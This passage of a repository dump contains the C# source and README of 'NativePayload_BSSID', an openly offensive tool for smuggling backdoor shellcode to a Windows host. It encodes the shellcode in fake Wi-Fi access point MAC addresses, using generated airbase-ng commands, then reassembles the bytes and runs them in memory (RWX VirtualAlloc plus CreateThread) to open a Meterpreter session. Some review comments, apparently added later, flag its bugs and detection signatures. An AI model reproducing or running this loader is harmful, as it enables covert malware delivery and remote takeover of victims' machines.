149 | /// to Fake AP in C#
150 | /// also you can dump information for this code like KEY , MAC and ProfileName from Fake AP by my technique too
151 | /// note : by Scan Method your attack is very Slowly and Quietly too
152 |
153 | //foreach (Wlan.WlanProfileInfo profileInfo in wlanIface.GetProfiles())
154 | //{
155 | // string name = profileInfo.profileName; // this is typically the network's SSID
156 |
157 | // string xml = wlanIface.GetProfileXml(profileInfo.profileName);
158 | //}
159 |
160 | //string profileName = "Cheesecake";
161 | //string mac = "52544131303235572D454137443638";
162 | //string key = "hello";
// NOTE(review): the XML element tags of this format string were stripped by the page rendering.
163 | //string profileXml = string.Format("{0}{1}{0}ESSopenWEPfalsenetworkKeyfalse{2}0", profileName, mac, key);
164 |
165 | //wlanIface.SetProfile(Wlan.WlanProfileFlags.AllUser, profileXml, true);
166 | //wlanIface.Connect(Wlan.WlanConnectionMode.Profile, Wlan.Dot11BssType.Any, profileName);
167 | //wlanIface.DeleteProfile(profileName);
168 | }
169 | }
170 | catch (Exception eee)
171 | {
172 | Console.WriteLine("e3: " + eee.Message);
173 | }
174 | return Temp_BSSID;
175 | }
176 |
// Collected 10-hex-char chunks, in arrival order (the generic argument, presumably string, was stripped by the page).
177 | static List MacAddress = new List();
178 | public static string payload = "";
// Entry point. Three modes selected by args[0]: "null" (emit airbase-ng command lines for a hex payload),
// "help" (usage text), or any other value (treated as an ESSID to poll, then execute the collected bytes).
179 | static void Main(string[] args)
180 | {
181 | try
182 | {
183 |
184 | if (args.Length >= 1 && args[0].ToUpper() == "NULL")
185 | {
186 | Console.ForegroundColor = ConsoleColor.Red;
187 | Console.WriteLine();
188 | Console.WriteLine("Copy these lines to bash script1.sh file ;)");
189 | Console.WriteLine();
190 | Console.ForegroundColor = ConsoleColor.Gray;
191 | if (args.Length >= 2 && args[1] != null) { payload = args[1].ToString(); }
192 | int b = 0; // hex chars consumed in the current 10-char group
193 | int j = 0; // hex chars since the last ':' separator
194 | int LinesCode = 0; // number of payload command lines emitted
195 | string temp = "";
196 | /// "00:ff:00:ff:00:ff" flag for Attack start
197 | Console.WriteLine("airbase-ng -a 00:" + "ff:ff:ff:ff:ff" + " --essid \"Fake\" -I 10 -0 wlan0mon ;");
// Input is taken as-is; nothing checks that payload is hex or that its length is a multiple of 10.
// Characters left in an incomplete final group are never emitted (temp is not flushed after the loop).
198 | foreach (char item in payload)
199 | {
200 | temp += item;
201 |
202 | b++;
203 | j++;
204 | if (j == 2) { temp += ":"; j = 0; }
205 | if (b >= 10)
206 | {
207 | /// essid is name for Access point , in this case "Fake" ;)
208 | /// -I 10 , don't change this one , please
209 | Console.Write("airbase-ng -a 00:" + temp.Substring(0, temp.Length - 1) + " --essid \"Fake\" -I 10 -0 wlan0mon ;");
210 | Console.WriteLine(""); b = 0;
211 | temp = "";
212 | LinesCode++;
213 | }
214 |
215 | }
216 | /// "00:ff:00:ff:00:ff" flag for Attack Finish
217 | Console.WriteLine("airbase-ng -a 00:" + "ff:00:ff:00:ff" + " --essid \"Fake\" -I 10 -0 wlan0mon ;");
218 |
219 | Console.WriteLine("");
220 | Console.WriteLine("(" + LinesCode.ToString() + ") Command Lines for this PAYLOAD : " + payload);
221 |
222 | }
// NOTE(review): args[0] is read here without an args.Length check, so running with no arguments throws
// IndexOutOfRangeException, which the outer catch prints as a bare message instead of the help text.
223 | else if (args[0].ToUpper() != "NULL" && args[0].ToUpper() != "HELP")
224 | {
225 | Console.ForegroundColor = ConsoleColor.Gray;
226 | Console.WriteLine();
227 | Console.WriteLine("NativePayload_BSSID Tool Published by Damon Mohammadbagher");
228 | Console.WriteLine("Scanning Access Point : " + args[0].ToString());
229 | Console.WriteLine();
230 |
231 |
// Poll __show_BSSID every 8 s until it returns the end marker. There is no timeout, so this loop runs
// indefinitely if the marker never appears.
232 | while (true)
233 | {
234 |
235 | /// dont change sleep time ;) 8 ... 10 is good
236 | /// if you want change these times then you need change all sleep value in Script1.sh Sleep(Value_Time) too
237 | System.Threading.Thread.Sleep(8000);
238 |
239 | string _tmp_bssid = __show_BSSID(args[0]);
240 |
241 | /// flag for finish and execute Payload for getting Meterpreter Session
242 | if (_tmp_bssid == "ff00ff00ff") break;
243 | }
244 |
245 | /// time to getting Meterpreter Session ;)
// NOTE(review): sized by Capacity rather than Count, so the buffer can be larger than the data collected;
// the unused tail stays zero-filled.
246 | byte[] _X_Bytes = new byte[MacAddress.Capacity * 5];
247 | int b = 0;
248 | foreach (string X_item in MacAddress)
249 | {
// Five octets per entry: i takes 0, 2, 4, 6, 8.
250 | for (int i = 0; i <= 8; )
251 | {
252 | /// for debug only
253 | /// string MacAddress_Octets = X_item.ToString().Substring(i, 2);
254 |
255 | _X_Bytes[b] = Convert.ToByte("0x" + X_item.ToString().Substring(i, 2), 16);
256 |
257 | b++;
258 |
259 | i++; i++;
260 | }
261 | }
262 | try
263 | {
264 | Console.WriteLine("Dumped Payloads : ");
265 | int k = 0;
266 | foreach (string item in MacAddress)
267 | {
268 | Console.Write(k.ToString() + ": " + item.ToString() + " ");
269 | k++;
270 | }
271 | Console.WriteLine("15 sec Waiting....");
272 | System.Threading.Thread.Sleep(15000);
273 | Console.ForegroundColor = ConsoleColor.Yellow;
274 | Console.WriteLine("End time : {0}", DateTime.Now.ToString());
275 | Console.ForegroundColor = ConsoleColor.Gray;
276 | Console.WriteLine("Bingo Meterpreter session by BSSID and WIFI Traffic ;)");
// In-memory execution of the reassembled bytes: RWX allocation, copy, new thread started at the buffer,
// infinite wait. This VirtualAlloc(PAGE_EXECUTE_READWRITE) -> Marshal.Copy -> CreateThread sequence is a
// well-known host-side detection signature (thread start address in unbacked executable memory).
// VirtualFree is imported below but never called, so the region is never released.
277 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)_X_Bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
278 | Marshal.Copy(_X_Bytes, 0, (IntPtr)(funcAddr), _X_Bytes.Length);
279 | IntPtr hThread = IntPtr.Zero;
280 | UInt32 threadId = 0;
281 | IntPtr pinfo = IntPtr.Zero;
282 | // execute native code
283 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
284 | WaitForSingleObject(hThread, 0xFFFFFFFF);
285 |
286 | }
287 | catch (Exception e6)
288 | {
289 |
290 | Console.ForegroundColor = ConsoleColor.Gray;
291 | Console.WriteLine("Main Error : {0}", e6.Message);
292 | }
293 | }
// Help text. The executable name is spelled "NativePaylaod" in these literals; left as-is (runtime strings).
294 | else if(args[0].ToUpper()=="HELP")
295 | {
296 | Console.ForegroundColor = ConsoleColor.Gray;
297 | Console.WriteLine();
298 | Console.WriteLine("NativePayload_BSSID Tool Published by Damon Mohammadbagher");
299 | Console.WriteLine("Transferring Payload on AIR by BSSID and WIFI Traffic \n");
300 | Console.ForegroundColor = ConsoleColor.Cyan;
301 | Console.WriteLine("syntax 1 : Making Script.sh File for making Fake AP");
302 | Console.WriteLine("\t and injecting Payloads to AP MAC-Address by airbase-ng \n");
303 | Console.WriteLine("syntax 1 : NativePaylaod_BSSID.exe null \"payload string\"");
304 | Console.WriteLine("syntax 1 : NativePaylaod_BSSID.exe null \"fce80f109ab0371fbcd1100...\"\n");
305 | Console.ForegroundColor = ConsoleColor.DarkCyan;
306 | Console.WriteLine("syntax 2 : NativePaylaod_BSSID.exe \"Name for Access point OR essid\"");
307 | Console.WriteLine("syntax 2 : NativePaylaod_BSSID.exe \"fake\"");
308 | Console.ForegroundColor = ConsoleColor.Gray;
309 | }
310 | }
311 | catch (Exception e)
312 | {
313 |
314 | Console.WriteLine(e.Message);
315 | }
316 |
317 | }
318 | private static UInt32 MEM_COMMIT = 0x1000;
319 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
320 |
// kernel32 imports. Pointer-sized parameters and return values are declared as UInt32 here, so these
// signatures only fit a 32-bit process.
321 | [DllImport("kernel32")]
322 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
323 | [DllImport("kernel32")]
324 | private static extern bool VirtualFree(IntPtr lpAddress, UInt32 dwSize, UInt32 dwFreeType);
325 | [DllImport("kernel32")]
326 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
327 | [DllImport("kernel32")]
328 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
329 | }
330 |
331 | }
332 | -------------------------------------------------------------------------------- /README.md: 
-------------------------------------------------------------------------------- 1 | # NativePayload_BSSID 2 | Transferring Backdoor Payload by BSSID and Wireless traffic 3 | 4 | Published by Damon Mohammadbagher 5 | 6 | 7 | Syntax : NativePayload_BSSID.exe help 8 | 9 | Syntax : NativePayload_BSSID.exe null "payload string" 10 | 11 | Syntax : NativePayload_BSSID.exe "ESSID" 12 | 13 | 14 | For a step-by-step guide you should visit one of these links: 15 | 16 | link1 : https://www.linkedin.com/pulse/transferring-backdoor-payloads-bssid-wireless-traffic-mohammadbagher 17 | 18 | link2 : https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bssid-by-wireless-traffic-damon-mohammadbagher 19 | 20 | Video : https://youtu.be/W0dJGln3tls 21 | 22 | 23 | Note : the C# source code for "managedwifi.dll" is at 24 | 25 | link : https://managedwifi.codeplex.com/SourceControl/latest 26 | 27 | 28 | If you want, you can download that C# source code and build your own DLL file; that is better than using the "managedwifi.dll" from this GitHub repository ... 29 | 30 | but this file is ok .... I hope ;) 31 | 32 |

33 | -------------------------------------------------------------------------------- /Video-[v2]/README.md: -------------------------------------------------------------------------------- 1 | # Video [NativePayload_BSSIDv2.wmv] for NativePayload_BSSID.sh v2 2 | -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-aa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-aa -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ab: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ab -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ac: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ac -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ad: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ad -------------------------------------------------------------------------------- /Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ae: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/Video-[v2]/Video.NativePayload_BSSIDv2.zip.part-ae -------------------------------------------------------------------------------- /managedwifi.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/managedwifi.dll --------------------------------------------------------------------------------